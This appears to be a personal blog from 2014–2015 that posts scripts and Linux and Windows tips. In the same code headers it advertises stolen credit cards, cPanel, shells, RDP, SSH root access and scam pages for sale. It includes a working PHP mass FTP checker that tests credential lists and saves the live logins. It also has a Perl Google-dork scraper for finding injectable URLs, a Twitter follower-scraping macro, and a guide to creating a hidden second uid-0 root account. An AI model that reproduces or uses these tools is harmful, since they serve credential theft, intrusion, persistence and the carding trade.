Tuesday, May 5, 2015

Master Video for CPA Movie

Just Download it
- 10 Video HD with different duration per file
- files size 9 - 17 MB
- download file size 9,8 MB

screenshot


Download Link:
Master Video For CPA Movie.zip

Tuesday, April 21, 2015

Script For Grabing Followers Twitter

This is script iMacros for grab followers twitter from my video :D



VERSION BUILD=8890130 RECORDER=FX
SET !EXTRACT_TEST_POPUP NO
WAIT SECONDS=2
TAG POS=1 TYPE=DIV ATTR=CLASS:user-list
TAG POS=2 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=3 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=4 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=5 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=6 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=7 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=8 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=9 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=10 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=11 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=12 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=13 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=14 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=15 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=16 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=17 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=18 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=19 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=20 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
TAG POS=21 TYPE=SPAN ATTR=CLASS:username&&TXT:* EXTRACT=TXT
SAVEAS TYPE=EXTRACT FOLDER=* FILE=test.csv
WAIT SECONDS=2
TAG POS=1 TYPE=A ATTR=TXT:Show<sp>more<sp>people

Sunday, March 8, 2015

[Php] Mass FTP Checker

 <?php  
 #####################################################################################################################  
 #[+] Usage: php ftpchecker.php file.txt[+]                                                                          #  
 #                                                                                                                   #  
 #Recoded By ccfresh.info                                                                                            #  
 #Yogyacarder.link                                                                                                   #  
 #Ready Stock:                                                                                                       #  
 #CC Fresh | cPanel | Shell | Mailer | RDP | SSH root | SSH Tuneling | FTP | WebMail | SMTP | Email Leads | ScamPages#  
 #Contact YM: ccfresh.info Email: ccfresh.info@yahoo.com                                                             #  
 #####################################################################################################################  
      if(count($argv) < 2){  
           echo "===========================\n";  
           echo "[+] PHP Mass FTP Checker\n";  
           echo "[+] Recoded By ccfresh.info\n";  
           echo "[+] Usage: php $argv[0] file.txt\n";  
           echo "[+] file.txt must be: <host> <user> <password><space>\n";  
           echo "[+] |ccfresh.info ccfresh mypassword | (end with space)\n";  
           echo "===========================";  
           exit();  
      }  
      $file = $argv[1];  
      $detail = file_get_contents($file);  
      $ftps = explode("\n",$detail);  
      function pecah_ftp($ftp1){  
           $ftp = array();  
           $s = explode(" ",$ftp1);  
           $ftp['host'] = $s[0];            
           $ftp['user'] = $s[1];  
           $ftp['pass'] = $s[2];  
           return $ftp;  
      }  
      foreach($ftps as $ftp1){  
           echo "\nChecking ".$ftp1 . PHP_EOL;  
           $ftp = pecah_ftp($ftp1);  
           echo $ftp['host']."\n";  
           echo $ftp['user']."\n";  
           echo $ftp['pass']."\n";  
                $ftp_server = $ftp['host'];  
                $ftp_user = $ftp['user'];  
                $ftp_pass = $ftp['pass'];  
                // set up a connection or die  
                $timeout = 5;  
                $conn_id = ftp_connect($ftp_server,21,$timeout);   
                // try to login  
                if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {  
                     echo "Connected as $ftp_user@$ftp_server\n";  
                     $fl=fopen("ftplive.txt","a");  
                     fwrite($fl,$ftp_server." ".$ftp_user." ".$ftp_pass."\n");  
                     fclose($fl);  
                     ftp_close($conn_id);  
                } else {  
                     echo "Couldn't connect as $ftp_user\n";  
                }  
 }  
 ?>  

[Perl] Google Dork

Before I've posted Google Scraper with UI, and now I will post google dorking with perl
check this code
 #!/usr/bin/perl -w  
 #####################################################################################################################  
 #[+] Usage: GoogleDork.pl <dork> [+]                                                                                #  
 #                                                                                                                   #  
 #Coded By ccfresh.info                                                                                              #  
 #Yogyacarder.link                                                                                                   #  
 #Ready Stock:                                                                                                       #  
 #CC Fresh | cPanel | Shell | Mailer | RDP | SSH root | SSH Tuneling | FTP | WebMail | SMTP | Email Leads | ScamPages#  
 #Contact YM: ccfresh.info Email: ccfresh.info@yahoo.com                                                             #  
 #####################################################################################################################  
 use WWW::Mechanize;  
 use WWW::Mechanize::TreeBuilder;  
 use URI::Escape;  
 if(@ARGV!= 1){&usage;}  
 else{  
 print "\n";  
 print "----------------------------------\n";  
 print "-     GoogleDork.pl     -\n";  
 print "-     by ccfresh.info    -\n";  
 print "----------------------------------\n";  
 print "\n";  
 print "Please Wait...\n";  
 print "\n";  
      open(LOG,">>results.txt") || die "Can't open file\n";  
      print LOG "-------------------------------\n";  
      print LOG "Dork: ".$ARGV[0]."\n";  
      print LOG "-------------------------------\n";  
      close(LOG);  
 my $google = "http://www.google.com/search?q=";  
 my $dork = $ARGV[0];  
 my $mech = WWW::Mechanize->new;  
 WWW::Mechanize::TreeBuilder->meta->apply($mech);  
 for (my $i=0; $i<=1000; $i+=100){  
 $mech->get($google.$dork."&num=100&start=".$i);  
 my @links = $mech->links();  
 for my $link ( @links ) {  
 my $res = $link->url;  
 while ($res =~ m/\/url\?q=(.*?)&sa=U&ei=/g) {  
 my $link = $1;  
 if ($link !~ /google/){  
      my $ss = uri_unescape($1);  
      print $ss."\n";  
      open(LOG,">>results.txt") || die "Can't open file\n";  
      print LOG $ss, "\n";  
      close(LOG);  
 }  
 }  
 }  
 }  
 print "Done!!\n";  
 }  
 sub usage{  
   print "[-] GoogleDork.pl <dork>\n";  
   print "[-] example : GoogleDork.pl index.php?id\n";  
   die("[!] Usage incorrect !!\n");  
 }  

Download File

How to use :
perl GoogleDork.pl <dork>

example : 
perl GoogleDork.pl index.php?id


Saturday, December 13, 2014

[Linux] Install EPEL repo in CentOS

List default repository CentOS on my server

CentOS-Base.repo

or you can check with this command

[root@vix3r ~]# ls -al /etc/yum.repos.d/
total 28
drwxr-xr-x 2 root root 4096 Dec 14 18:30 .
drwxr-xr-x 61 root root 4096 Dec 14 08:24 ..
-rw-r--r-- 1 root root 1926 Dec 14 19:07 CentOS-Base.repo
-rw-r--r-- 1 root root 638 Dec 14 19:07 CentOS-Debuginfo.repo
-rw-r--r-- 1 root root 630 Dec 14 19:07 CentOS-Media.repo
-rw-r--r-- 1 root root 4528 Dec 14 19:07 CentOS-Vault.repo

[root@vix3r ~]# yum repolist enabled
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
* base: centos.mirror.freedomvoice.com
* extras: mirror.nwresd.org
* updates: mirror.stanford.edu
repo id repo name status name
base CentOS-6 - Base 6,367 Base
extras CentOS-6 - Extras 14 Extras
updates CentOS-6 - Updates 297 Updates
repolist: 6,678

INSTAL EPEL REPOSITORY

Download epel-release
Version 7 (64bit)
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
rpm -Uvh epel-release-7-5.noarch.rpm

Version 6.x (64bit)
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
rpm -Uvh epel-release-6-8.noarch.rpm

Version 6.x (32bit)
wget http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm
rpm -Uvh epel-release-6-8.noarch.rpm

Version 5.x (64bit)
wget http://dl.fedoraproject.org/pub/epel/5/x86_64/epel-release-5-4.noarch.rpm
rpm -Uvh epel-release-5-4.noarch.rpm

Version 5.x (32bit)
wget http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm
rpm -Uvh epel-release-5-4.noarch.rpm

Version 4.x (64bit)
wget http://dl.fedoraproject.org/pub/epel/4/x86_64/epel-release-4-10.noarch.rpm
rpm -Uvh epel-release-4-10.noarch.rpm

Version 4.x (32bit)
wget http://dl.fedoraproject.org/pub/epel/4/i386/epel-release-4-10.noarch.rpm
rpm -Uvh epel-release-4-10.noarch.rpm


recheck repolist

[root@vix3r ~]# ls -al /etc/yum.repos.d/
total 44
drwxr-xr-x 2 root root 4096 Dec 14 19:07 .
drwxr-xr-x 70 root root 4096 Dec 14 19:07 ..
-rw-r--r-- 1 root root 2031 Dec 14 19:07 CentOS-Base.repo
-rw-r--r-- 1 root root 647 Dec 14 19:07 CentOS-Debuginfo.repo
-rw-r--r-- 1 root root 289 Dec 14 19:07 CentOS-fasttrack.repo
-rw-r--r-- 1 root root 630 Dec 14 19:07 CentOS-Media.repo
-rw-r--r-- 1 root root 5394 Dec 14 19:07 CentOS-Vault.repo
-rw-r--r-- 1 root root 957 Dec 14 20:24 epel.repo
-rw-r--r-- 1 root root 1056 Dec 14 20:24 epel-testing.repo

[root@horcux ~]# yum repolist enabled
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
 * base: mirror.vodien.com
 * epel: mirror.smartmedia.net.id
 * extras: mirror.vodien.com
 * updates: mirror.vodien.com
repo id repo name status
base CentOS-6 - Base 6,503+15
epel Extra Packages for Enterprise Linux 6 - x86_64 11,283
extras CentOS-6 - Extras 36
updates CentOS-6 - Updates 494
repolist: 18,577


Epel repo instaled :D

[Linux] Add user as Root

For example I will add user bejo6 as root
You need login as root first, then run this following command:


[root@linux]# /usr/sbin/useradd -u 0 -o -g root -G 1,2,3,6,10 -m bejo6
[root@linux]# passwd bejo6
[root@linux]# type your password
[root@linux]# retype your password
[root@linux]# service sshd restart


Finnaly login with new user, then check status with this command:
"whoami;id"

login as: bejo6
bejo6@bejo6.com's password:
Last login: Sat Dec 13 14:40:16 2014 from 127.0.0.1
[root@linux ~]# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
[root@linux ~]#


Wednesday, October 29, 2014

[Windows] How to set password phpmyadmin xampp

When you install XAMPP in your windows machine, the root password for the MySQL is set to empty. But this is not recommended, as the MySQL database without a password will be accessible to everyone. To fix this, a proper/secure password must be set to the user root.

- open http://localhost/phpmyadmin/
- then chose tab "SQL"
- Now type the following query in the textarea and click Go
UPDATE mysql.user SET Password=PASSWORD('yourpassword') WHERE User='root'; FLUSH PRIVILEGES;











- And you will see a message saying that the query has been executed successfully

Next step you need to modify the phpMyAdmin config file (config.inc.php), coz if you refresh the page, you will be getting a error message.
- Locate the file config.inc.php will be found in your XAMPP directory under the folder phpmyadmin (in my case, this is my dir XAMPP "D:\xampp\phpMyAdmin" )



















- Open the file config.inc.php with your favorite text editor (I used notepad++).
- Find the following lines:

and replace value password and AllowNoPassword like this

 - Save file


Thursday, October 23, 2014

[Windows] Google Scraper

New Release Google Scraper


Feature :
- 1 click / Keyword
- Bypass captcha
- Result as .txt file

Requires :
- Internet Explore 11
- .Net Framwork 4.5

Tested on WIndows 7 ultimate 64 bit

 



If you want to buy me lunch :D